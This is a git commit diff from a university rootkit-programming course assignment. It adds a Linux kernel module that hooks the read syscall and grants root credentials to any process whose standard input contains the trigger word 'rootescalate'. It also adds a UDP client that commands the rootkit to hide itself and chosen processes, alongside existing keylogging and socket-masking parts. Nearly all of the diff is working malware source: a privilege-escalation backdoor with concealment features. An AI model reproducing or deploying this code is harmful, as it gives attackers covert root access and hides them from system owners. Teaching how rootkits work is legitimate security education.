Added functionality for priviledge escalation

Author: nnedkov

Assignment_7/conf_client.c

@@ -0,0 +1,101 @@
+/************* UDP CLIENT CODE *******************/
+
+#include <stdio.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <string.h>
+
+#define BUFSIZE 1028
+
+//char conf[BUFSIZE];
+const char *JSON_STRING =
+	"{"
+		"\"hide_module\": true,"
+		"\"unhide_module\": false,"
+
+		//"\"hide_files\": [\"file_str_3\", \"file_str_2\"],"
+		//"\"unhide_files\": [\"ufile_str_1\", \"ufile_str_2\"],"
+		"\"hide_processes\": [\"1\"],"
+		//"\"unhide_processes\": [\"1\"],"
+		//"\"hide_sockets_tcp4\": [\"tcp4_port_int_1\", \"tcp4_port_int_2\"],"
+		//"\"unhide_sockets_tcp4\": [\"tcp4_uport_int_1\", \"tcp4_uport_int_2\"],"
+		//"\"hide_sockets_tcp6\": [\"tcp6_port_int_1\", \"tcp6_port_int_2\"],"
+		//"\"unhide_sockets_tcp6\": [\"tcp6_uport_int_1\", \"tcp6_uport_int_2\"],"
+		//"\"hide_sockets_udp4\": [\"udp4_port_int_1\", \"udp4_port_int_2\"],"
+		//"\"unhide_sockets_udp4\": [\"udp4_uport_int_1\", \"udp4_uport_int_2\"],"
+		//"\"hide_sockets_udp6\": [\"udp6_port_int_1\", \"udp6_port_int_2\"],"
+		//"\"unhide_sockets_udp6\": [\"udp6_uport_int_1\", \"udp6_uport_int_2\"]"
+	"}";
+
+
+int main() {
+	int clientSocket, portNum, nBytes;
+	char buffer[BUFSIZE];
+	struct sockaddr_in serverAddr;
+	socklen_t addr_size;
+
+	//read_conf_from_file();
+
+	/* Create UDP socket */
+	clientSocket = socket(PF_INET, SOCK_DGRAM, 0);
+
+	/* Configure settings in address struct */
+	serverAddr.sin_family = AF_INET;
+	serverAddr.sin_port = htons(2325);
+	serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
+	memset(serverAddr.sin_zero, '\0', sizeof serverAddr.sin_zero);  
+
+	/*Initialize size variable to be used later on*/
+	addr_size = sizeof serverAddr;
+
+
+	//while(1) {
+		//printf("Send new conf to server?:\n");
+		//fgets(buffer, 1024, stdin);
+		//printf("You typed: |%s|",buffer);
+
+		//if (!strcmp(buffer, "no\n"))
+		//	return 0;
+		//else if (!strcmp(buffer, "yes\n")) {
+		//nBytes = strlen(buffer) + 1;
+    
+			/* Send message to server */
+			sendto(clientSocket, JSON_STRING, strlen(JSON_STRING), 0, (struct sockaddr *) &serverAddr, addr_size);
+			printf("Sent to server:\n\n%s\n\n", JSON_STRING);
+
+			/* Receive message from server */
+			//nBytes = recvfrom(clientSocket, buffer, BUFSIZE, 0, NULL, NULL);
+
+			//printf("Received from server: %s\n", buffer);
+		//}
+	//}
+
+	return 0;
+}
+
+
+/*
+int read_conf_from_file()
+{
+	FILE *fp;	
+	char *file_name = "conf.txt";
+
+	fp = fopen(file_name, "r");   // read mode
+ 
+	if (fp == NULL) {
+		perror("Error while opening the file.\n");
+		return 1;
+	}
+ 
+	printf("The contents of %s file are :\n", file_name);
+
+	fscanf(fp, "%s", conf);
+	fgets(conf, 1028, fp);
+	printf("%s\n", conf);
+ 
+	fclose(fp);
+
+	return 0;
+}
+*/
+

Assignment_7/rootkit/Makefile

@@ -28,9 +28,9 @@ KDIR = /lib/modules/$(shell uname -r)/build
 TARGET = rootkit
 
 obj-m += $(TARGET).o
-rootkit-objs := module_masking.o network_keylogging.o process_masking.o socket_masking.o conf_manager.o jsmn.o udp_server.o core.o
+rootkit-objs := module_masking.o network_keylogging.o privil_escalation.o process_masking.o socket_masking.o conf_manager.o jsmn.o udp_server.o core.o
 ccflags-y = -Wno-unused-function
-#file_masking.o priviledge_escalating.o
+#file_masking.o
 
 all:	$(SYSMAP_HEADER)
 	make -C $(KDIR) M=$(PWD) modules

Assignment_7/rootkit/core.c

@@ -28,6 +28,7 @@
 #include "sysmap.h"				/* Needed for ROOTKIT_SYS_CALL_TABLE */
 #include "module_masking.h"		/* Needed for ... */
 #include "network_keylogging.h"	/* Needed for ... */
+#include "privil_escalation.h"			/* Needed for ... */
 #include "process_masking.h"	/* Needed for ... */
 #include "socket_masking.h"		/* Needed for ... */
 #include "conf_manager.h"		/* Needed for ... */
@@ -96,6 +97,7 @@ static int __init core_start(void)
 	//TODO: check return values
 	//module_masking_init(DEBUG_MODE_IS_ON);
 	network_keylogging_init(DEBUG_MODE_IS_ON);
+	privil_escalation_init(DEBUG_MODE_IS_ON);
 	process_masking_init(DEBUG_MODE_IS_ON);
 	socket_masking_init(DEBUG_MODE_IS_ON);
 	conf_manager_init(DEBUG_MODE_IS_ON);
@@ -127,6 +129,7 @@ static void __exit core_end(void)
 	conf_manager_exit();
 	socket_masking_exit();
 	process_masking_exit();
+	privil_escalation_exit();
 	network_keylogging_exit();
 	//module_masking_exit();
 

Assignment_7/rootkit/privil_escalation.c

@@ -0,0 +1,178 @@
+
+/*******************************************************************************/
+/*                                                                             */
+/*   Course: Rootkit Programming                                               */
+/*   Semester: WS 2015/16                                                      */
+/*   Team: 105                                                                 */
+/*   Assignment: 7                                                             */
+/*                                                                             */
+/*   Filename: privil_escalation.c                                             */
+/*                                                                             */
+/*   Authors:                                                                  */
+/*       Name: Matei Pavaluca                                                  */
+/*       Email: [email protected]                                        */
+/*                                                                             */
+/*       Name: Nedko Stefanov Nedkov                                           */
+/*       Email: [email protected]                                */
+/*                                                                             */
+/*   Date: December 2015                                                       */
+/*                                                                             */
+/*   Usage:                                                                    */
+/*                                                                             */
+/*******************************************************************************/
+
+#include <linux/module.h>		/* Needed by all modules */
+#include <linux/unistd.h>		/* Needed for __NR_read */
+#include <linux/thread_info.h>
+#include <linux/sched.h>
+
+
+/*******************************************************************************/
+/*                                                                             */
+/*                       DEFINITIONS - DECLARATIONS                            */
+/*                                                                             */
+/*******************************************************************************/
+
+
+/* Definition of macros */
+#define PRINT(str) printk(KERN_INFO "rootkit privil_escalation: %s\n", (str))
+#define DEBUG_PRINT(str) if (show_debug_messages) PRINT(str)
+#define PRIV_ESC "rootescalate"
+
+
+/* Definition of global variables */
+static int show_debug_messages;
+asmlinkage long (*pe_original_read_syscall)(unsigned int, char __user *, size_t);   //TODO: should point to original_read
+int priv_escalate_matched_so_far;
+
+
+/* Definition of functions */
+int privil_escalation_init(int);
+int privil_escalation_exit(void);
+
+asmlinkage long privil_escalation_read_syscall(unsigned int, char __user *, size_t);
+
+static int count_matches(char *, char *, int *);
+static void set_root_cred(void);
+
+
+/*******************************************************************************/
+/*                                                                             */
+/*                                  CODE                                       */
+/*                                                                             */
+/*******************************************************************************/
+
+
+/* Initialization function */
+int privil_escalation_init(int debug_mode_on)
+{
+	show_debug_messages = debug_mode_on;
+
+	DEBUG_PRINT("initialized");
+
+	return 0;
+}
+
+
+int privil_escalation_exit(void)
+{
+
+	DEBUG_PRINT("exited");
+
+	return 0;
+}
+
+
+/* Function that replaces the original read syscall. In addition to what
+   read syscall does, it also looks for a command. ... */
+asmlinkage long my_read_syscall(unsigned int fd, char __user *buf, size_t count)
+{
+	long ret;
+
+	/* Call original read syscall */
+	ret = pe_original_read_syscall(fd, buf, count);
+
+	/* If the read was not from STDIN don't do anything */
+	if (fd != 0)
+		return ret;
+
+	/* Check if `rootescalate` was typed */
+	if (count_matches(buf, PRIV_ESC, &priv_escalate_matched_so_far))
+		set_root_cred();
+
+	return ret;
+}
+
+
+/* Count matches of specified command in the user input */
+static int count_matches(char *buf, char *command, int *chars_matched_so_far)
+{
+	int matches;
+	int i;
+
+	/* Match the command */
+	matches = i = 0;
+	while (i < strlen(buf)) {
+		if (command[(*chars_matched_so_far)++] != buf[i++])
+			*chars_matched_so_far = 0;
+
+		if (strlen(command) == *chars_matched_so_far) {
+			*chars_matched_so_far = 0;
+			matches++;
+		}
+	}
+
+	return matches;
+}
+
+
+static void set_root_cred(void)
+{
+	struct cred *pcred;
+
+	pcred = prepare_creds();
+
+	pcred->uid.val = pcred->euid.val = pcred->suid.val = pcred->fsuid.val = 0;
+	pcred->gid.val = pcred->egid.val = pcred->sgid.val = pcred->fsgid.val = 0;
+
+	commit_creds(pcred);
+
+	printk(KERN_INFO "rootkit privil_escalation: successfully escalated priviledges for PID: %d\n", current->pid);
+}
+
+
+/* static void set_cred(void)
+{
+	struct cred *elevated = prepare_creds();
+
+	elevated->suid = current->cred->uid;
+	elevated->sgid = current->cred->gid;
+
+	elevated->uid.val = 0;
+	elevated->gid.val = 0;
+	elevated->euid = elevated->uid;
+	elevated->egid = elevated->gid;
+
+	commit_creds(elevated);
+
+	printk(KERN_INFO "saved uid: %d gid: %d\n", current->cred->suid.val, current->cred->sgid.val);
+} */
+
+
+/* static void restore_cred(void)
+{
+	struct cred *lowered = prepare_creds();
+
+	lowered->uid = current->cred->suid;
+	lowered->gid = current->cred->sgid;
+	lowered->euid = lowered->uid;
+	lowered->egid = lowered->gid;
+
+	lowered->suid.val = lowered->sgid.val = 0;
+
+	commit_creds(lowered);
+
+	printk(KERN_INFO "restored uid: %d gid: %d\n", current->cred->uid.val, current->cred->gid.val);
+
+} */
+

Assignment_7/rootkit/privil_escalation.h

@@ -0,0 +1,34 @@
+
+/*******************************************************************************/
+/*                                                                             */
+/*   Course: Rootkit Programming                                               */
+/*   Semester: WS 2015/16                                                      */
+/*   Team: 105                                                                 */
+/*   Assignment: 7                                                             */
+/*                                                                             */
+/*   Filename: privil_escalation.h                                             */
+/*                                                                             */
+/*   Authors:                                                                  */
+/*       Name: Matei Pavaluca                                                  */
+/*       Email: [email protected]                                        */
+/*                                                                             */
+/*       Name: Nedko Stefanov Nedkov                                           */
+/*       Email: [email protected]                                */
+/*                                                                             */
+/*   Date: December 2015                                                       */
+/*                                                                             */
+/*   Usage: Header file for module `privil_escalation.c`                       */
+/*                                                                             */
+/*******************************************************************************/
+
+#ifndef __PRIVIL_ESCALATION__
+#define __PRIVIL_ESCALATION__
+
+
+/* Declaration of functions */
+int privil_escalation_init(int);
+int privil_escalation_exit(void);
+
+asmlinkage long privil_escalation_read_syscall(unsigned int, char __user *, size_t);
+
+#endif